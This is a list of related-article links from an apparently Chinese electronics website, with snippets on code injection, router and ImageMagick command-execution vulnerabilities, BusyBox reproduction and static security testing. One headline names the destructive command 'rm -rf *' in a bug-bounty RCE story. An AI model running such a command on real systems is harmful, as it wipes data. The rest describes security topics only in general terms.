隨著互聯(lián)網(wǎng)的發(fā)展，嵌入式設(shè)備正分布在一個充滿可以被攻擊者利用的源代碼級安全漏洞的環(huán)境中。因此，嵌入式軟件開發(fā)人員應(yīng)該了解不同類型的安全漏洞——特別是代碼注入。術(shù)語“代碼注入”意味著對程序的常規(guī)數(shù)據(jù)

2021-01-06 15:13:13

1606

嵌入式代碼的致命安全漏洞

2021-01-15 15:07:55

1897

思科升級遠(yuǎn)程命令執(zhí)行等高危漏洞

1月19日，思科發(fā)布了安全公告，旗下小型企業(yè)RV110W，RV130，RV130W和RV215W路由器中發(fā)現(xiàn)了遠(yuǎn)程命令執(zhí)行等高危漏洞，建議盡快升級。以下是漏洞詳情：

2021-01-20 15:40:49

1529

我在服務(wù)器上執(zhí)行了rm -rf *

前情提要前段時間，我在一個非公開的 Bug 賞金項目里發(fā)現(xiàn)了一個嚴(yán)重的漏洞，這個漏洞可以允許遠(yuǎn)程執(zhí)行代碼。在我提交漏洞報告的幾個小時后，我收到了第一封郵件回復(fù)，他們說會盡快確認(rèn)漏洞然后再和我聯(lián)系

2021-02-02 13:56:29

1379

基于神經(jīng)網(wǎng)絡(luò)和代碼相似度的漏洞檢測

靜態(tài)漏洞檢測通常只針對文本進(jìn)行檢測，執(zhí)行效率高但是易產(chǎn)生誤報。針對該問題，結(jié)合神經(jīng)網(wǎng)絡(luò)技術(shù)提出一種基于代碼相似性的漏洞檢測方法。通過對程序源代碼進(jìn)行敏感函數(shù)定位、程序切片和變量替換等數(shù)據(jù)預(yù)處理操作

2021-05-24 15:13:52

模型調(diào)優(yōu)和復(fù)現(xiàn)算法遇到的一些坑

的數(shù)據(jù)增強方式與代碼的實現(xiàn)不一樣等。（這些可能發(fā)生在開源復(fù)現(xiàn)者沒有“一比一”復(fù)現(xiàn)論文的情況，也可能發(fā)生在論文作者自己沒有實現(xiàn)的情況）

2022-05-18 15:03:29

994

神秘而復(fù)雜的漏洞披露程序阻礙了安全性

的嚴(yán)重性，可以很容易地遠(yuǎn)程利用，并使受影響的組件完全無法使用。四分之一沒有修復(fù)，或者只能部分修復(fù)。潛伏在軟件供應(yīng)鏈中的未知漏洞可能導(dǎo)致潛在破壞的一個例子是最近在 RTOS 中命名的BadAlloc集群和來自多個供應(yīng)商的支持庫。這些可用于拒絕服務(wù)攻擊或遠(yuǎn)程代碼執(zhí)行。點擊查看

2022-07-20 18:04:39

681

Arduino Nano 33 IoT遠(yuǎn)程調(diào)試及編碼

電子發(fā)燒友網(wǎng)站提供《Arduino Nano 33 IoT遠(yuǎn)程調(diào)試及編碼.zip》資料免費下載

2022-10-26 10:57:18

遠(yuǎn)程伺服執(zhí)行器開源分享

電子發(fā)燒友網(wǎng)站提供《遠(yuǎn)程伺服執(zhí)行器開源分享.zip》資料免費下載

2023-02-03 09:39:18

車聯(lián)網(wǎng)開源組件BusyBox漏洞分析及復(fù)現(xiàn)

近日，國內(nèi)多家安全實驗室檢測到了針對于智能網(wǎng)聯(lián)汽車中使用都開源項目busybox漏洞，國外在2022年5月份報告了此漏洞

2023-02-21 17:49:56

1533

Kiuwan：更好編碼的3個步驟

代碼安全測試的主要方法是使用靜態(tài)應(yīng)用程序安全測試或SAST。這種類型的測試涉及代碼掃描，以識別源代碼中的漏洞。這允許編碼人員重新檢查敏感性并采取預(yù)防措施來應(yīng)對可能的網(wǎng)絡(luò)攻擊。

2023-02-23 09:34:10

218

看圖片也能中招的漏洞原理

漏洞描述：ImageMagick 在處理惡意構(gòu)造的圖片文件時，對于文件中的 URL 未經(jīng)嚴(yán)格過濾，可導(dǎo)致命令注入漏洞。通過命令注入漏洞，黑客可以在服務(wù)器上執(zhí)行任意系統(tǒng)命令，獲取服務(wù)器權(quán)限。

2023-04-06 10:25:04

195

某CMS的命令執(zhí)行漏洞通用挖掘思路分享

大概是在上半年提交了某個CMS的命令執(zhí)行漏洞，現(xiàn)在過了那么久，也想通過這次挖掘通用型漏洞，整理一下挖掘思路，分享給大家。

2023-05-18 17:18:58

2147

使Struts2應(yīng)用程序更安全：不要包含配置瀏覽器

Struts2 插件包含擴展、替換或添加到現(xiàn)有 Struts 框架功能的類和配置。除了 JAR 文件之外，還可以通過將其 JAR 文件添加到應(yīng)用程序的類路徑來安裝插件，以滿足插件本身可能具有的任何

2023-05-25 15:08:57

213

Python中的默認(rèn)編碼

####1. Python源代碼文件的執(zhí)行過程我們都知道，磁盤上的文件都是以二進(jìn)制格式存放的，其中文本文件都是以某種特定編碼的字節(jié)形式存放的。對于程序源代碼文件的字符編碼是由編輯器指定的，比如

2023-07-05 16:11:02

827

PT2264遠(yuǎn)程控制編碼器C手冊

PT2264是一個遠(yuǎn)程控制編碼器與PT2294利用CMOS技術(shù)配對.數(shù)據(jù)編碼地址pins適合RF調(diào)制成串行編碼波形.PT2264有一個最大三狀態(tài)地址12的bits pins提供到531,441（或3減少任何代碼沖突和未經(jīng)授權(quán)的代碼掃描的可能性。

2023-08-21 09:18:13